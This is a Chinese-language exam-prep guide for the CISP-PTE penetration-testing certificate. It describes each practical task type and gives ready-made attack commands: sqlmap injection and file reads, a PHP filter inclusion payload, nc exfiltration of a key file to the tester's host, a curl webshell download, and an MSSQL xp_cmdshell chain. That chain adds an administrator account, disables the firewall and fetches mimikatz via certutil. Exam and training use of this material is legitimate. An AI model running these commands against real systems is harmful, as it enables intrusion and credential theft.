CISP-PTE认证考试要点总结

CISP-PTE是国家认证的渗透测试工程师，考试内容还算全面，主要以基础入门为主，跟其他考试相比更注重实际操作。

考试满分100分，70分合格，题型主要包括理论题20分，实操题80分，换句话说，只要实操题做对了就能合格。

由于理论题范围较广，靠的是知识积累，建议随缘看着选，我们的重点主要放在实操题。而且实操题的类型比较固定，可以熟记套路便可通过考试，非常适合基础较差但想快速拿证的群体。

实操题的目标是让你获取试题中的key值，每个key10分。

5个基础题，每个基础题有1个key，共计50分。

1个综合题，3个key，共计30分。

接下来进入题目解析。

基础题1：sql注入

sql注入主要考察的不是你手工注入能力，而是sqlmap的使用能力和熟悉程度。一般来说，题干中会过滤空格，括号，union等常见注入参数。这就需要用到sqlmap的tamper功能。

常用tamper脚本类型如下：

space2comment.py  可将空格替换成/**/进行绕过

randomcase.py 随机大小写

between.py 用between替换>

主要就这3种，其他的脚本说明都可在网上查找，考试的时候一般只用space2comment.py 就可以了。

注入指令为：python sqlmap.py -u "url" -p id --dbms mysql --level 3 --risk 3 --tamper tamper/space2comment.py 

注入成功后：python sqlmap.py -u "url" -p id --dbms mysql --level 3 --risk 3 --tamper tamper/space2comment.py -D 数据库名 --file-read “题干中要求的key的路径”

 

基础题2：文件上传

文件上传套路挺多的，主要考察对burpsuite的运用。如何熟练的抓包改包，以及发现上传路径。

注意的点主要是mimetype的修改和对php3,php4,php5,phtml的使用。

 

基础题3：文件包含

这道题主要考察对php伪协议的使用。

在文件包含位置输入：file=php:filter//read=convert.base64-encode/resource=../key.php

对所读文件进行base64编码，获得编码值后解密即可。

 

基础题4：命令执行

一般来说，命令执行只需要手动cat key.php就行。但是题目中会把这类查看命令屏蔽，所以这道题解题思路就是找到能绕过屏蔽的办法。

思路1：利用nc转发，将key.php从目标机转发至本地端口打印进行读取。

           考试环境中会提供nc工具，那么cmd直接cd到nc目录下，输入:nc -lvvv -p 9999，l表示监听，v表示打印篇幅，p表示监听端口

            然后在题目上进行命令执行：|nc 本机ip 9999 < ../key.php  ，就能在上面的cmd中获取到key的信息。

思路2：利用curl在目标机中植入木马，连上木马后即可在目标机目录内找到key。

本机建立http站点：python -m SimperHTTPServer 默认端口8000

目标机从本机下载木马：curl -o 1.php http://本机ip:8000/1.php

 然后用菜刀连接就行了。

 

基础题5：日志审计

这个题说实话比较弱智，而且非常简单。就是给你一份web日志，让你发现攻击者的访问路径，从而通过这个路径找到key。

解题思路首先需要过滤非http 200的请求，因为既然访问成功那必然返回会是200。

在200的清单里面找寻关键字，admin，login，manage，system等，同时还结合请求，如果存在连续大规模的post请求后有一个get请求，那么很可能就表示攻击者在提交正确表单后登陆了新的页面。

追踪此访问路径即可获得key。如果页面需要登陆，那么你可能还需要burp进行暴力破解。

 

综合题

综合题一般是一个winserver+.net+mssql的环境。题目不会告诉你具体访问口，这需要你用nmap扫描。扫到正确端口后再用御剑进行目录扫描。

这时候你应该会获得一些信息，会有登陆页面，或者一些报错的页面。登陆页面直接使用暴力破解，如果不能破解，那么去看报错的页面，页面中会给出file=的关键变量。

可通过file=../../../的方式尝试读取aspx的配置文件web.config，因为是考试，所以你一定能找到。读取配置文件后根据文件中内容可获得mssql的账户，然后连接mssql即可获得网站登陆账号，进去后获得第一个key1。

进入后台，直接找到文件管理的地方，尝试上传shell，这里考题中会给出上传规则，比如文件名截断，你就可以根据此条规则构造上传名，比如上传名为1234567.jpg，服务器只允许7个字符，那么.jpg就被截断了，那么我们构造12.aspx.jpg,上传后就会成功变成12.aspx，然后找到路径用菜刀连上可获得key2。这里说一下就是找路径的方法，可根据报错信息以及上传文件名还有试题中给出的范例进行拼接。

如果你成功做到这一步，那么恭喜你已经获得70分合格了，可以直接交卷了。第三个key算是一个小考验，不过也是很套路。

因为这是在考试，所以在前面的过程中你一定会发现mssql的sa账号，然后用sa登陆进行xp_cmdshell的操作。常见的操作有：

sp_configure 'show advanced options',1; (记得reconfigure) 

sp_configure 'xp_cmdshell',1;（记得reconfigure）启用xp_cmdshell

exec xp_cmdshell 'dir c:\ /s /b |findstr "key"|findstr "txt"'; 找到key的位置

exec xp_cmdshell 'type key位置"'; 直接读key内容，不过一般不会让你有直接读的权限

exec xp_cmdshell 'cacls c:\ /s /b |findstr "key"|findstr "txt" /E /G adminstrator:F'; 改变文件操作权限，F是所有权限，改变权限后再读就能成功

exec xp_cmdshell 'certutil -urlcache -f -split http://本机:8000/3389.exe'; 这里的certutil的方式与基础题4中的curl思路相同，可参考。这里上传的是开启3389的工具。

exec xp_cmdshell 'net user username password /add';exec xp_cmdshell 'net localgroup administrators username /add';创建账户

exec xp_cmdshell 'netsh firewall set opmode disable'; 如果目标开了防火墙，那么即使开启3389端口也无法连接，这条命令用于关闭防火墙。

exec xp_cmdshell 'certutil -urlcache -f -split http://本机:8000/mimikazts.exe';如果不能建立账户，那么需要工具去破解系统账户的密码。这里使用的mimikazts。

综上所述，其实整个考试比较轻松，掌握好套路即可过关。但是在实战中还是要了解各个漏洞原理，才能运用自如。